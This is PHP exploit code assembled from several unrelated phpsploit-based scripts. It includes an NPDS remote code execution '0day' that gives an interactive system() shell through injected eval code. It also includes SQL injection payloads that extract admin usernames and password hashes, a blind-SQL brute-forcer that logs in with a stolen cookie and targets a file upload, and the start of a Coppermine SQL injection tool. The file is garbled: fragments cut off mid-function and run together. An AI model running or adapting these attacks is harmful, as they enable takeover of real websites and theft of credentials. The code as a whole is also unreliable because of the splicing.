function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
if ($argc < 3) {
print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
exit(1);
}
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
$xpl->proxy($pro);
}
if ($pra) {
$xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125. settype ($lid, "integer");
# 126. PrintPage("links",$DB, $lid);
#
# 30. if ($oper=="links") {
# 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32. list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40. if ($DB) {
# 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
$aid = 'CONCAT(CHAR(66,69,71,73,78,85,83,82),(SELECT%20aid%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,85,83,82))';
$pwd = 'CONCAT(CHAR(66,69,71,73,78,80,87,68),(SELECT%20pwd%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,80,87,68))';
}
$url = getparam("url", 1);
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
$a = 0;
$v = '';
$dfield = $field;
exit(1);
}
$url = getparam('url', 1);
$file = getparam('file', 1);
$prfix = getparam('prefix') != '' ? getparam('prefix') : 'webs';
$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
$match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
$xpl->proxy($proxy);
}
if ($authp) {
$xpl->proxyauth($authp);
}
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
$pxs = $argv[4];
$pxa = $argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
print "\nstatus> Using a proxy {$pxs}";
$xpl->proxy($pxs);
}
if (!empty($pxa)) {
print "\nstatus> Basic proxy authentification {$pxa}";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
print "\nsploit> Coppermine version " . $matches[1];
} else {
print "\nsploit> Not found";
}
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';
/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
